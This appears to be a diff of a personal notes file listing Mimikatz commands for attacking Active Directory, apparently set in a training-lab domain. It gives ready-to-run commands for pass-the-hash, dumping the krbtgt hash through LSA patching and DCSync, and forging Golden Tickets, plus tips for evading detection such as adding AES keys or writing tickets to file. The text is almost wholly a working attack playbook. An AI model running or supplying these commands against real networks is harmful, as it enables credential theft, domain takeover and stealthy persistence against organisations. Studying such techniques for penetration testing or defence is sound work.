doxd/hackalacka/notes/AD_Powershell.md

 * Pass the Hash: `Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:5f4dcc3b5aa765d61d8327deb882cf99 /run:powershell.exe"'`
   * To evade some detection of PTH, include the other hash types as well as ntlm `/aes256:<hash> /aes128:<hash> /ntlm:</hash>`
 * Golden Ticket
-  * Execute mimikatz on DC as Domain Admin to get krbtgt hash `Invoke-Mimikatz -Command '"lsadump::lsa /patch"'` **OR** on any computer as Domain Admin to get krbtgt hash `Invoke-Mimikatz -command '"lsadump::dcsync /user:dcorp\krbtgt"'`
+  * Execute mimikatz on DC as Domain Admin to get krbtgt hash `Invoke-Mimikatz -Command '"lsadump::lsa /patch"'` **OR** on any computer as Domain Admin to get krbtgt hash `Invoke-Mimikatz -command '"lsadump::dcsync /user:dcorp\krbtgt"'` ALSO (untested): `lsadump::samrpc /patch` (on DC)
-  * Now we can generate a Golden Ticket using this hash `Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211123506631-3219952063-538504511 /krbtgt:5f4dcc3b5aa765d61d8327deb882cf99 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'`   (use `Get-ADDomain` to get SID of domain).
+  * Now we can generate a Golden Ticket using this hash `Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211123506631-3219952063-538504511 /krbtgt:5f4dcc3b5aa765d61d8327deb882cf99 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'`   (use `Get-ADDomain` to get SID of domain).
 Instead of `/ptt` (injected in memory), can use `/ticket` to save to a file.
 This *may sometimes* help evade detection
   * Now we can access network services (eg use `ls`, `schtasks`, `PsExec` etc on remote machines as the user specified)
   * `klist` to view cached tickets
   * To evade some detection, use `/aes256:<aes256keysofkrbtgt>`